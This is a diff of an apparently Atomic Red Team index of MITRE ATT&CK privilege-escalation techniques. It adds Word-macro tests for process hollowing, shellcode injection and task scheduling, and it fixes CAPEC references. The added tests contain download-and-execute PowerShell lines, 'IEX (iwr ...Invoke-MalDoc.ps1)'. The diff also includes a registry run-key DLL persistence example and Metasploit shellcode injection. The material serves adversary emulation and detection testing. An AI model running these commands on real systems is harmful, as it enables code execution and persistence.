Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
@@ -3298,15 +3321,15 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T19:39:50.839Z'
+ modified: '2020-08-26T14:18:08.480Z'
created: '2020-01-24T15:05:58.384Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
- SYSTEM
x_mitre_detection: |-
- Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
+ Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
x_mitre_data_sources:
@@ -3589,6 +3612,12 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-640
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/640.html
- source_name: Man LD.SO
url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
@@ -3618,7 +3647,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-15T21:59:25.358Z'
+ modified: '2020-09-16T16:49:46.904Z'
created: '2020-03-13T20:09:59.569Z'
x_mitre_platforms:
- Linux
@@ -3631,7 +3660,7 @@ privilege-escalation:
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -3900,6 +3929,12 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1543.004
url: https://attack.mitre.org/techniques/T1543/004
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
July 10, 2017.
@@ -3946,11 +3981,11 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:27:49.609Z'
+ modified: '2020-09-16T15:46:44.130Z'
created: '2020-01-17T19:23:15.227Z'
x_mitre_data_sources:
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_effective_permissions:
- root
@@ -4813,62 +4848,55 @@ privilege-escalation:
atomic_tests: []
T1574.007:
technique:
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ created: '2020-03-13T14:10:43.424Z'
+ modified: '2020-09-16T16:56:34.583Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1574.007
+ url: https://attack.mitre.org/techniques/T1574/007
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-38
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/38.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by PATH Environment Variable
description: |-
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- name: Path Interception by PATH Environment Variable
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1574.007
- url: https://attack.mitre.org/techniques/T1574/007
- - external_id: CAPEC-capec
- source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-06-20T22:02:40.983Z'
- created: '2020-03-13T14:10:43.424Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1574.008:
technique:
- created: '2020-03-13T17:48:58.999Z'
- modified: '2020-03-26T20:03:27.496Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -4886,9 +4914,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.008
url: https://attack.mitre.org/techniques/T1574/008
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-159
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/159.html
- url: http://msdn.microsoft.com/en-us/library/ms682425
description: Microsoft. (n.d.). CreateProcess function. Retrieved December
5, 2014.
@@ -4904,6 +4932,16 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:03:35.217Z'
+ created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -4928,23 +4966,13 @@ privilege-escalation:
atomic_tests: []
T1574.009:
technique:
- created: '2020-03-13T13:51:58.519Z'
- modified: '2020-03-26T19:55:39.867Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
url: https://attack.mitre.org/techniques/T1574/009
- - external_id: CAPEC-capec
+ - external_id: CAPEC-38
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/38.html
- source_name: Microsoft CurrentControlSet Services
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services
@@ -4972,7 +5000,17 @@ privilege-escalation:
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- x_mitre_version: '1.0'
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:05:23.755Z'
+ created: '2020-03-13T13:51:58.519Z'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5365,6 +5403,71 @@ privilege-escalation:
$oldprofile = cat $profile | Select-Object -skiplast 1
Set-Content $profile -Value $oldprofile
name: powershell
+ T1547.012:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.012
+ url: https://attack.mitre.org/techniques/T1547/012
+ - source_name: Microsoft AddPrintProcessor May 2018
+ url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor
+ description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved
+ October 5, 2020.
+ - source_name: ESET PipeMon May 2020
+ url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
+ description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
+ Group. Retrieved August 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Print Processors
+ description: "Adversaries may abuse print processors to run malicious DLLs during
+ system boot for persistence and/or privilege escalation. Print processors
+ are DLLs that are loaded by the print spooler service, spoolsv.exe, during
+ boot. \n\nAdversaries may abuse the print spooler service by adding print
+ processors that load malicious DLLs at startup. A print processor can be installed
+ through the AddPrintProcessor API call with an account that has
+ SeLoadDriverPrivilege enabled. Alternatively, a print processor
+ can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet
+ or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture:
+ e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry
+ key that points to the DLL. For the print processor to be correctly installed,
+ it must be located in the system print-processor directory that can be found
+ with the GetPrintProcessorDirectory API call.(Citation: Microsoft
+ AddPrintProcessor May 2018) After the print processors are installed, the
+ print spooler service, which starts during boot, must be restarted in order
+ for them to run.(Citation: ESET PipeMon May 2020) The print spooler service
+ runs under SYSTEM level permissions, therefore print processors installed
+ by an adversary may run under elevated privileges."
+ id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-09T16:05:36.344Z'
+ created: '2020-10-05T13:24:49.780Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations.
+
+ Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.
+ x_mitre_data_sources:
+ - Process monitoring
+ - Windows Registry
+ - File monitoring
+ - DLL monitoring
+ - API monitoring
+ x_mitre_contributors:
+ - Mathieu Tartare, ESET
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
T1055.009:
technique:
external_references:
@@ -5641,6 +5744,39 @@ privilege-escalation:
'
name: powershell
+ - name: RunPE via VBA
+ auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
+ description: 'This module executes calc.exe from within the WINWORD.EXE process
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
+ -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
+ name: powershell
T1055:
technique:
id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
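Review bot: The `command:` executor downloads `Invoke-MalDoc.ps1` from the `master` branch of a GitHub repository and runs it through `IEX`, so what executes on the test host is whatever that branch contains at run time rather than a reviewed, pinned script; the hunks adding `Shellcode execution via VBA` and `Task Scheduler via VBA` use the same line. Referencing a specific commit in the raw URL, or shipping the helper with the atomic under `PathToAtomicsFolder`, would make the test reproducible and keep its executed code inside this repository's review. In `prereq_command`, `Stop-Process -Name $process` terminates every running instance of the product, including a user's open documents, just to confirm the application exists; holding the created COM object and calling its `Quit()` method, e.g. `$app = New-Object -COMObject "#{ms_product}.Application"; $app.Quit()`, checks the same prerequisite without that side effect. The technique entry this test list belongs to starts outside the hunk.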
@@ -5778,6 +5914,37 @@ privilege-escalation:
mavinject $mypid /INJECTRUNNING #{dll_payload}
name: powershell
elevation_required: true
+ - name: Shellcode execution via VBA
+ auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
+ description: |
+ This module injects shellcode into a newly created process and executes. By default the shellcode is created,
+ with Metasploit, for use on x86-64 Windows 10 machines.
+
+ Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
+ is required.
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The 64-bit version of Microsoft Office must be installed
+
+'
+ prereq_command: |
+ try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
+ manually to meet this requirement"
+
+'
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+ name: powershell
T1055.008:
technique:
external_references:
@@ -6024,6 +6191,14 @@ privilege-escalation:
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
12, 2014.
source_name: Microsoft Run Key
+ - source_name: Microsoft Wow6432Node 2018
+ url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
+ description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data
+ in the Registry. Retrieved August 3, 2020.
+ - source_name: Malwarebytes Wow6432Node 2016
+ url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/
+ description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved
+ August 3, 2020.
- url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key
description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry
Key. Retrieved June 29, 2018.
@@ -6046,26 +6221,30 @@ privilege-escalation:
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
- The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
+ Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
@@ -6083,9 +6262,9 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T16:16:26.182Z'
+ modified: '2020-08-03T16:30:26.918Z'
created: '2020-01-23T22:02:48.566Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -6479,10 +6658,58 @@ privilege-escalation:
>$null 2>&1
'
+ - name: Task Scheduler via VBA
+ auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
+ description: |
+ This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
+ 30 - 40 seconds after this module has run
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
+ -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
+ name: powershell
T1053:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:46.977Z'
+ modified: '2020-10-14T15:20:01.069Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Scheduled Task/Job
+ description: |-
+ Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
+
+ Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
external_references:
- source_name: mitre-attack
external_id: T1053
@@ -6494,35 +6721,21 @@ privilege-escalation:
description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved
June 8, 2016.
source_name: TechNet Task Scheduler Security
- description: |-
- Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
-
- Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
- name: Scheduled Task/Job
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-24T13:45:04.006Z'
- created: '2017-05-31T21:30:46.977Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_remote_support: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -6533,19 +6746,18 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_version: '2.0'
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1546.002:
technique:
@@ -6707,9 +6919,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.010
url: https://attack.mitre.org/techniques/T1574/010
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-17
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/17.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -6727,7 +6939,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:37:28.912Z'
+ modified: '2020-09-16T19:10:04.262Z'
created: '2020-03-12T20:43:53.998Z'
x_mitre_contributors:
- Travis Smith, Tripwire
@@ -6762,9 +6974,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.011
url: https://attack.mitre.org/techniques/T1574/011
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-478
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/478.html
- source_name: Registry Key Security
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
description: Microsoft. (2018, May 31). Registry Key Security and Access Rights.
@@ -6815,7 +7027,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:01:09.906Z'
+ modified: '2020-09-16T19:07:48.590Z'
created: '2020-03-13T11:42:14.444Z'
x_mitre_defense_bypassed:
- Application control
@@ -7321,10 +7533,7 @@ privilege-escalation:
service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd
functionality to establish persistent access to victim systems by creating
and/or modifying service unit files that cause systemd to execute malicious
- commands at recurring intervals, such as at system boot.(Citation: Anomali
- Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation:
- Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation:
- acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries
+ commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries
typically require root privileges to create/modify service unit files in the
/etc/systemd/system and /usr/lib/systemd/system
directories, low privilege users can create/modify service unit files in directories
@@ -7338,6 +7547,12 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1543.002
url: https://attack.mitre.org/techniques/T1543/002
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- source_name: 'Linux man-pages: systemd January 2014'
url: http://man7.org/linux/man-pages/man1/systemd.1.html
description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
@@ -7350,18 +7565,6 @@ privilege-escalation:
url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With
a New Malware Family Written in Golang. Retrieved April 24, 2019.
